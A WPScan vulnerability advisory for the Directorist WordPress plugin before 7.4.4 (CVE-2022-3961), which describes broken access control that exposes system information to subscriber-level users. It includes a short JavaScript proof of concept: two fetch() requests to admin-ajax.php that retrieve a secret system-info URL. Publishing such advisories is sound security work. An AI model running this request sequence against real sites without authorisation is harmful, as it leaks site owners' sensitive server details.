WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Directorist < 7.4.4 - Subscriber+ Sensitive Information Disclosure

Description

The plugin does not prevent users with low privileges (like subscribers) from accessing sensitive system information.

Proof of Concept

fetch('http://wpscan.local/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=send_system_info',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

fetch('https://wpscan.local/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=generate_url',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Then we get the secret url for system info

Affects Plugins

directorist
Fixed in version 7.4.4

References

CVE
CVE-2022-3961

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website
https://lana.codes/
Submitter twitter
LanaCodes
Verified

Yes

WPVDB ID
6aad6454-de1b-4304-9c14-05e28d08b253

Timeline

Publicly Published

2022-11-28 (about 6 months ago)

Added

2022-11-28 (about 6 months ago)

Last Updated

2022-11-28 (about 6 months ago)

Our Other Services

WPScan WordPress Security Plugin